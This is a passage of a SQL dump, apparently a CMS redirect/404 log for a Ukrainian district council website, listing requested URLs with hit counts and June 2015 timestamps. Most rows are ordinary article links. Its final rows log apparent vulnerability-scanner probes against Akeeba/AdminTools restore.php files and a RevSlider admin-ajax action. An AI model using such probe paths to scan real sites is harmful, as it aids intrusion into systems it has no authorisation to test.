20:39:53','0000-00-00 00:00:00',301),(14152,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=277:-2010-&catid=16:2010-06-06-10-55-25&Itemid=63&lang=en','','','',2,0,'2015-06-01 20:42:54','0000-00-00 00:00:00',301),(14153,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=838:-2013-&catid=11&Itemid=14&lang=ru','','','',4,0,'2015-06-01 20:45:23','0000-00-00 00:00:00',301),(14154,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=1:-14052010&layout=blog&Itemid=10&lang=en&limitstart=5','','','',1,0,'2015-06-01 20:53:16','0000-00-00 00:00:00',301),(14155,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=714:2012-06-14-15-15-43&catid=36&Itemid=70&lang=uk','','','',6,0,'2015-06-01 20:57:00','0000-00-00 00:00:00',301),(14156,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=203:2010-12-15-14-10-45&catid=29:--15122010-&Itemid=60&lang=en','','','',4,0,'2015-06-01 20:57:53','0000-00-00 00:00:00',301),(14157,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=69:2010-07-22-13-04-59&catid=11&Itemid=16&lang=uk','','','',2,0,'2015-06-01 21:10:33','0000-00-00 00:00:00',301),(14158,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1183:2014-01-28-09-18-31&catid=11&Itemid=14&lang=en','','','',2,0,'2015-06-01 21:17:30','0000-00-00 00:00:00',301),(14159,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=403:2011-09-29-05-41-20&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2015-06-01 21:20:02','0000-00-00 00:00:00',301),(14160,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=78:2010-08-02-10-54-18&catid=11&Itemid=16&lang=uk','','','',2,0,'2015-06-01 21:28:34','0000-00-00 00:00:00',301),(14161,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=838:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2015-06-01 21:40:37','0000-00-00 00:00:00',301),(14162,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=838:-2013-&catid=11&Itemid=14&lang=en','','','',3,0,'2015-06-01 21:46:41','0000-00-00 00:00:00',301),(14163,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1136:-2013-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',1,0,'2015-06-01 21:50:43','0000-00-00 00:00:00',301),(14164,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1342:2014-06-12-09-42-47&catid=11&Itemid=14&lang=uk','','','',1,0,'2015-06-01 21:53:14','0000-00-00 00:00:00',301),(14165,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1086:2013-09-16-13-00-16&catid=36&Itemid=70&lang=en','','','',3,0,'2015-06-01 21:54:11','0000-00-00 00:00:00',301),(14166,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1008:2013-05-20-07-02-57&catid=11&lang=uk','','','',1,0,'2015-06-01 21:55:32','0000-00-00 00:00:00',301),(14167,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1342:2014-06-12-09-42-47&catid=11&Itemid=14&lang=en','','','',4,0,'2015-06-01 22:12:05','0000-00-00 00:00:00',301),(14168,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1149:2013-11-28-14-51-59&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',2,0,'2015-06-01 22:13:25','0000-00-00 00:00:00',301),(14169,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=726:2012-06-21-08-11-40&catid=11&Itemid=14&lang=uk','','','',2,0,'2015-06-01 22:14:46','0000-00-00 00:00:00',301),(14170,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=716:2012-06-14-15-19-24&catid=43:--25072012-&Itemid=82&lang=en','','','',2,0,'2015-06-01 22:17:34','0000-00-00 00:00:00',301),(14171,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=909:2013-01-21-10-09-40&catid=36&Itemid=70&lang=uk','','','',3,0,'2015-06-01 22:19:51','0000-00-00 00:00:00',301),(14172,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=403:2011-09-29-05-41-20&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2015-06-01 22:21:30','0000-00-00 00:00:00',301),(14173,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=817:---------------l--r&catid=45&Itemid=84&lang=ru','','','',3,0,'2015-06-01 22:27:40','0000-00-00 00:00:00',301),(14174,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=777:2012-10-02-10-06-36&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',3,0,'2015-06-01 22:34:13','0000-00-00 00:00:00',301),(14175,'http://www.malyn-rayrada.org.ua/index.php?option=com_poll&id=4:2010-08-13-08-15-19&lang=en&Itemid=0','','','',2,0,'2015-06-01 22:45:53','0000-00-00 00:00:00',301),(14176,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1008:2013-05-20-07-02-57&catid=11&lang=uk&Itemid=','','','',2,0,'2015-06-01 22:47:34','0000-00-00 00:00:00',301),(14177,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=5&Itemid=1&lang=uk','','','',1,0,'2015-06-01 22:51:06','0000-00-00 00:00:00',301),(14178,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=752:2012-09-04-12-05-12&catid=11&lang=uk&Itemid=0','','','',3,0,'2015-06-01 23:10:32','0000-00-00 00:00:00',301),(14179,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=526:-----2012-&catid=38:--19122011-&Itemid=73&lang=ru','','','',2,0,'2015-06-01 23:13:33','0000-00-00 00:00:00',301),(14180,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=403:2011-09-29-05-41-20&catid=11&Itemid=14&lang=en','','','',1,0,'2015-06-01 23:14:34','0000-00-00 00:00:00',301),(14181,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1173:2014-01-15-10-37-18&catid=11&lang=en&Itemid=0','','','',1,0,'2015-06-01 23:33:58','0000-00-00 00:00:00',301),(14182,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=838:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2015-06-01 23:36:10','0000-00-00 00:00:00',301),(14183,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=203:2010-12-15-14-10-45&catid=29&Itemid=60&lang=uk','','','',2,0,'2015-06-01 23:39:15','0000-00-00 00:00:00',301),(14184,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1235:2014-03-06-13-25-26&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2015-06-01 23:41:00','0000-00-00 00:00:00',301),(14185,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=277:-2010-&catid=16:2010-06-06-10-55-25&Itemid=65&lang=en','','','',3,0,'2015-06-01 23:51:05','0000-00-00 00:00:00',301),(14186,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=291:-lr&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2015-06-01 23:55:04','0000-00-00 00:00:00',301),(14187,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=75:2010-07-30-10-51-13&catid=11:2010-06-05-14-33-33&Itemid=16&lang=uk','','','',3,0,'2015-06-01 23:56:21','0000-00-00 00:00:00',301),(14188,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=5&Itemid=0&lang=en','','','',5,0,'2015-06-01 23:56:36','0000-00-00 00:00:00',301),(14189,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1253:-2013-&catid=10:2010-06-05-13-46-44&Itemid=17&lang=uk','','','',2,0,'2015-06-01 23:56:41','0000-00-00 00:00:00',301),(14190,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1108:-24-&catid=11&Itemid=14&lang=en','','','',1,0,'2015-06-01 23:57:22','0000-00-00 00:00:00',301),(14191,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1253:-2013-&catid=10:2010-06-05-13-46-44&Itemid=17&lang=ru','','','',3,0,'2015-06-02 00:01:42','0000-00-00 00:00:00',301),(14192,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=909:2013-01-21-10-09-40&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',3,0,'2015-06-02 00:02:58','0000-00-00 00:00:00',301),(14193,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1105:2013-10-11-16-43-25&catid=11&lang=en&Itemid=','','','',1,0,'2015-06-02 00:03:37','0000-00-00 00:00:00',301),(14194,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=61:2010-07-09-07-23-49&catid=11:2010-06-05-14-33-33&Itemid=16&lang=en','','','',3,0,'2015-06-02 00:04:20','0000-00-00 00:00:00',301),(14195,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=520:-2012-2013-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',1,0,'2015-06-02 00:06:53','0000-00-00 00:00:00',301),(14196,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=297:q10-q&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2015-06-02 00:08:13','0000-00-00 00:00:00',301),(14197,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=478:2011-11-25-09-31-44&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2015-06-02 00:09:57','0000-00-00 00:00:00',301),(14198,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1300:2014-04-25-07-21-54&catid=11&Itemid=14&lang=ru','','','',1,0,'2015-06-02 00:15:07','0000-00-00 00:00:00',301),(14199,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1149:2013-11-28-14-51-59&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',1,0,'2015-06-02 00:16:07','0000-00-00 00:00:00',301),(14200,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=121:2010-09-08-08-42-57&catid=11:2010-06-05-14-33-33&Itemid=16&lang=uk','','','',1,0,'2015-06-02 00:24:11','0000-00-00 00:00:00',301),(14201,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=42:-2010-&catid=1:-14052010&Itemid=10&lang=en','','','',2,0,'2015-06-02 00:31:13','0000-00-00 00:00:00',301),(14202,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1108:-24-&catid=11&lang=uk','','','',2,0,'2015-06-02 00:31:18','0000-00-00 00:00:00',301),(14203,'http://www.malyn-rayrada.org.ua/index.php?option=com_poll&id=2:2010-06-09-12-30-50&lang=ru','','','',2,0,'2015-06-02 00:33:58','0000-00-00 00:00:00',301),(14204,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1153:-------2013-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',2,0,'2015-06-02 00:35:37','0000-00-00 00:00:00',301),(14205,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=5&Itemid=32&lang=en&limitstart=20','','','',1,0,'2015-06-02 00:37:18','0000-00-00 00:00:00',301),(14206,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=117:2--65-------&catid=11&Itemid=16&lang=uk','','','',2,0,'2015-06-02 00:38:01','0000-00-00 00:00:00',301),(14207,'http://www.malyn-rayrada.org.ua/index.php?option=com_poll&id=4:2010-08-13-08-15-19&lang=uk&Itemid=0','','','',3,0,'2015-06-02 00:41:10','0000-00-00 00:00:00',301),(14208,'http://www.malyn-rayrada.org.ua/index.php?option=com_poll&id=2:2010-06-09-12-30-50&lang=uk&Itemid=0','','','',1,0,'2015-06-02 00:42:04','0000-00-00 00:00:00',301),(14209,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=77:2010-08-02-05-31-11&catid=11&Itemid=16&lang=ru','','','',2,0,'2015-06-02 00:42:38','0000-00-00 00:00:00',301),(14210,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1105:2013-10-11-16-43-25&catid=11&lang=uk','','','',2,0,'2015-06-02 00:45:12','0000-00-00 00:00:00',301),(14211,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=10&lang=en&limitstart=5','','','',2,0,'2015-06-02 00:46:51','0000-00-00 00:00:00',301),(14212,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=950:2013-03-06-13-10-57&catid=11&lang=ru&Itemid=','','','',2,0,'2015-06-02 00:47:03','0000-00-00 00:00:00',301),(14213,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=253:17-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2015-06-02 00:48:46','0000-00-00 00:00:00',301),(14214,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1229:2014-02-28-09-49-28&catid=11&Itemid=14&lang=ru','','','',1,0,'2015-06-02 00:48:55','0000-00-00 00:00:00',301),(14215,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=143:2010-10-15-07-33-13&catid=11:2010-06-05-14-33-33&Itemid=16&lang=ru','','','',2,0,'2015-06-02 01:06:41','0000-00-00 00:00:00',301),(14216,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1215:-1200-&catid=11&lang=uk&Itemid=','','','',2,0,'2015-06-02 01:07:34','0000-00-00 00:00:00',301),(14217,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=855:2012-12-12-14-22-20&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2015-06-02 01:08:02','0000-00-00 00:00:00',301),(14218,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1181:2014-01-22-06-06-13&catid=11&lang=en&Itemid=','','','',2,0,'2015-06-02 01:08:07','0000-00-00 00:00:00',301),(14219,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1149:2013-11-28-14-51-59&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',2,0,'2015-06-02 01:12:27','0000-00-00 00:00:00',301),(14220,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=143:2010-10-15-07-33-13&catid=11&Itemid=16&lang=ru','','','',2,0,'2015-06-02 01:16:34','0000-00-00 00:00:00',301),(14221,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=403:2011-09-29-05-41-20&catid=11&lang=en&Itemid=0','','','',3,0,'2015-06-02 01:17:18','0000-00-00 00:00:00',301),(14222,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1183:2014-01-28-09-18-31&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2015-06-02 01:19:13','0000-00-00 00:00:00',301),(14223,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1335:2014-06-07-10-58-30&catid=11&Itemid=14&lang=en','','','',3,0,'2015-06-02 01:28:58','0000-00-00 00:00:00',301),(14224,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=143:2010-10-15-07-33-13&catid=11:2010-06-05-14-33-33&Itemid=16&lang=en','','','',1,0,'2015-06-02 01:36:56','0000-00-00 00:00:00',301),(14225,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=838:-2013-&catid=11&lang=uk&Itemid=','','','',3,0,'2015-06-02 01:39:01','0000-00-00 00:00:00',301),(14226,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1108:-24-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2015-06-02 01:51:18','0000-00-00 00:00:00',301),(14227,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=42:-2010-&catid=1:-14052010&Itemid=10&lang=ru','','','',3,0,'2015-06-02 01:55:40','0000-00-00 00:00:00',301),(14228,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=851:-2013-&catid=36&Itemid=70&lang=ru','','','',1,0,'2015-06-02 02:12:23','0000-00-00 00:00:00',301),(14229,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=838:-2013-&catid=11&lang=en','','','',3,0,'2015-06-02 02:12:55','0000-00-00 00:00:00',301),(14230,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=403:2011-09-29-05-41-20&catid=11&lang=uk','','','',1,0,'2015-06-02 02:15:21','0000-00-00 00:00:00',301),(14231,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=754:2012-09-10-11-03-35&catid=11&Itemid=14&lang=ru','','','',2,0,'2015-06-02 02:15:37','0000-00-00 00:00:00',301),(14232,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=403:2011-09-29-05-41-20&catid=11&Itemid=14&lang=uk','','','',1,0,'2015-06-02 02:17:40','0000-00-00 00:00:00',301),(14233,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=277:-2010-&catid=16:2010-06-06-10-55-25&Itemid=65&lang=ru','','','',3,0,'2015-06-02 02:30:44','0000-00-00 00:00:00',301),(14234,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=714:2012-06-14-15-15-43&catid=36&Itemid=70&lang=ru','','','',2,0,'2015-06-02 02:31:34','0000-00-00 00:00:00',301),(14235,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=851:-2013-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',2,0,'2015-06-02 02:33:02','0000-00-00 00:00:00',301),(14236,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1253:-2013-&catid=10:2010-06-05-13-46-44&Itemid=17&lang=en','','','',1,0,'2015-06-02 02:36:29','0000-00-00 00:00:00',301),(14237,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=55&lang=uk&limitstart=5','','','',1,0,'2015-06-02 02:37:28','0000-00-00 00:00:00',301),(14238,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1342:2014-06-12-09-42-47&catid=11&lang=uk','','','',1,0,'2015-06-02 02:37:42','0000-00-00 00:00:00',301),(14239,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=121:2010-09-08-08-42-57&catid=11&Itemid=16&lang=en','','','',5,0,'2015-06-02 02:44:14','0000-00-00 00:00:00',301),(14240,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=5&Itemid=32&lang=uk','','','',2,0,'2015-06-02 02:44:21','0000-00-00 00:00:00',301),(14241,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1360:-qq&catid=11&Itemid=14&lang=en','','','',2,0,'2015-06-02 02:48:33','0000-00-00 00:00:00',301),(14242,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=5&Itemid=1&lang=ru','','','',2,0,'2015-06-02 02:48:55','0000-00-00 00:00:00',301),(14243,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=5&Itemid=32&lang=ru&limitstart=20','','','',2,0,'2015-06-02 02:49:21','0000-00-00 00:00:00',301),(14244,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=838:-2013-&catid=11&lang=ru','','','',2,0,'2015-06-02 02:52:47','0000-00-00 00:00:00',301),(14245,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=38:2010-06-11-09-28-19&catid=11&Itemid=16&lang=en','','','',2,0,'2015-06-02 03:12:51','0000-00-00 00:00:00',301),(14246,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=38:2010-06-11-09-28-19&catid=11:2010-06-05-14-33-33&Itemid=16&lang=uk','','','',2,0,'2015-06-02 03:13:45','0000-00-00 00:00:00',301),(14247,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=777:2012-10-02-10-06-36&catid=45:--14112012-&Itemid=84&lang=ru','','','',62,0,'2015-06-02 03:17:12','0000-00-00 00:00:00',301),(14248,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=117:2--65-------&catid=11&Itemid=16&lang=ru','','','',5,0,'2015-06-02 03:17:28','0000-00-00 00:00:00',301),(14249,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=754:2012-09-10-11-03-35&catid=11&lang=uk&Itemid=','','','',1,0,'2015-06-02 03:22:26','0000-00-00 00:00:00',301),(14250,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1108:-----------24-----&catid=11&Itemid=14&lang=en','','','',2,0,'2015-06-02 03:23:25','0000-00-00 00:00:00',301),(14251,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=763:2012-09-24-07-57-43&catid=11&lang=en&Itemid=','','','',2,0,'2015-06-02 03:25:19','0000-00-00 00:00:00',301),(14252,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=77:2010-08-02-05-31-11&catid=11:2010-06-05-14-33-33&Itemid=16&lang=ru','','','',2,0,'2015-06-02 03:29:45','0000-00-00 00:00:00',301),(14253,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=754:2012-09-10-11-03-35&catid=11&lang=ru','','','',2,0,'2015-06-02 03:35:37','0000-00-00 00:00:00',301),(14254,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=253:17-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2015-06-02 03:36:37','0000-00-00 00:00:00',301),(14255,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=121:2010-09-08-08-42-57&catid=11&Itemid=16&lang=uk','','','',4,0,'2015-06-02 03:47:35','0000-00-00 00:00:00',301),(14256,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/750-informacija-novovorob-ivskoi-silskoi-radi','','','',1,0,'2015-06-02 03:48:51','0000-00-00 00:00:00',301),(14257,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/754-informacija-slobidskoi-silskoi-radi','','','',1,0,'2015-06-02 03:48:54','0000-00-00 00:00:00',301),(14258,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/754-informacija-slobidskoi-silskoi-radi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-06-02 03:48:57','0000-00-00 00:00:00',301),(14259,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/755-informacija-morozivskoi-silskoi-radi','','','',1,0,'2015-06-02 03:48:59','0000-00-00 00:00:00',301),(14260,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/755-informacija-morozivskoi-silskoi-radi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-06-02 03:49:03','0000-00-00 00:00:00',301),(14261,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=950:2013-03-06-13-10-57&catid=11&Itemid=14&lang=ru','','','',2,0,'2015-06-02 03:54:35','0000-00-00 00:00:00',301),(14262,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=403:2011-09-29-05-41-20&catid=11&lang=ru&Itemid=','','','',2,0,'2015-06-02 04:01:12','0000-00-00 00:00:00',301),(14263,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=78:2010-08-02-10-54-18&catid=11&Itemid=16&lang=ru','','','',2,0,'2015-06-02 04:04:09','0000-00-00 00:00:00',301),(14264,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=512:2011-12-21-12-46-13&catid=36&Itemid=70&lang=en','','','',2,0,'2015-06-02 04:05:28','0000-00-00 00:00:00',301),(14265,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1183:2014-01-28-09-18-31&catid=11&lang=en','','','',3,0,'2015-06-02 04:08:06','0000-00-00 00:00:00',301),(14266,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=255:2011-03-01-09-19-09&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2015-06-02 04:09:31','0000-00-00 00:00:00',301),(14267,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=69:2010-07-22-13-04-59&catid=11&Itemid=16&lang=en','','','',3,0,'2015-06-02 04:10:44','0000-00-00 00:00:00',301),(14268,'http://www.malyn-rayrada.org.ua/templates/yoo_waybeyond','','','',2,0,'2015-06-02 04:24:09','0000-00-00 00:00:00',301),(14269,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1255:2014-03-27-06-02-11&catid=10:2010-06-05-13-46-44&Itemid=17&lang=uk','','','',2,0,'2015-06-02 04:30:22','0000-00-00 00:00:00',301),(14270,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=5&Itemid=32&lang=uk&limitstart=20','','','',2,0,'2015-06-02 04:30:38','0000-00-00 00:00:00',301),(14271,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=75:2010-07-30-10-51-13&catid=11&Itemid=16&lang=uk','','','',2,0,'2015-06-02 04:33:38','0000-00-00 00:00:00',301),(14272,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1242:-25-2011-74-19-2011-193-&catid=36&Itemid=70&lang=uk','','','',1,0,'2015-06-02 04:44:44','0000-00-00 00:00:00',301),(14273,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1206:-------l---28r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',2,0,'2015-06-02 04:48:52','0000-00-00 00:00:00',301),(14274,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1136:--------------2013-2015--&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',2,0,'2015-06-02 04:51:57','0000-00-00 00:00:00',301),(14275,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1185:2014-01-28-09-38-54&catid=36&Itemid=70&lang=ru','','','',3,0,'2015-06-02 04:52:09','0000-00-00 00:00:00',301),(14276,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1105:2013-10-11-16-43-25&catid=11&lang=ru&Itemid=0','','','',1,0,'2015-06-02 04:52:44','0000-00-00 00:00:00',301),(14277,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=325:2011-05-20-16-14-21&catid=33:-20052011&Itemid=66&lang=en','','','',2,0,'2015-06-02 05:18:16','0000-00-00 00:00:00',301),(14278,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=716:2012-06-14-15-19-24&catid=43:--25072012-&Itemid=82&lang=en','','','',3,0,'2015-06-02 05:51:59','0000-00-00 00:00:00',301),(14279,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=55&lang=en&limitstart=5','','','',2,0,'2015-06-02 06:21:37','0000-00-00 00:00:00',301),(14280,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=950:2013-03-06-13-10-57&catid=11&lang=en&Itemid=','','','',1,0,'2015-06-02 06:35:40','0000-00-00 00:00:00',301),(14281,'http://malyn-rayrada.org.ua/nghenhacodecca/index.php','','','',1,0,'2015-06-02 09:26:23','0000-00-00 00:00:00',301),(14282,'http://www.malyn-rayrada.org.ua/nghenhacodecca/index.php','','','',1,0,'2015-06-02 09:26:44','0000-00-00 00:00:00',301),(14283,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/750-informacija-novovorob-ivskoi-silskoi-radi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-06-02 16:42:48','0000-00-00 00:00:00',301),(14284,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=765:-qq&lang=uk&option=com_content&view=article','','','',3,0,'2015-06-03 11:22:02','0000-00-00 00:00:00',301),(14285,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=950:2013-03-06-13-10-57&lang=ru&option=com_content&view=article','','','',1,0,'2015-06-03 11:22:07','0000-00-00 00:00:00',301),(14286,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1223:--28-----6-&lang=ru&option=com_content&view=article','','','',1,0,'2015-06-03 11:22:11','0000-00-00 00:00:00',301),(14287,'http://malyn-rayrada.org.ua/administrator/components/com_admintools/restore.php','','','',1,0,'2015-06-03 23:52:18','0000-00-00 00:00:00',301),(14288,'http://malyn-rayrada.org.ua/administrator/components/com_akeeba/restore.php','','','',1,0,'2015-06-04 06:28:50','0000-00-00 00:00:00',301),(14289,'http://malyn-rayrada.org.ua/administrator/components/com_cmsupdate/restore.php','','','',1,0,'2015-06-04 21:38:09','0000-00-00 00:00:00',301),(14290,'http://www.malyn-rayrada.org.ua/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css','','','',1,0,'2015-06-06 07:54:48','0000-00-00 00:00:00',301),(14291,'http://www.malyn-rayrada.org.ua/yardim/wp-admin/admin-ajax.php','','','',1,0,'2015-06-06 07:55:10','0000-00-00 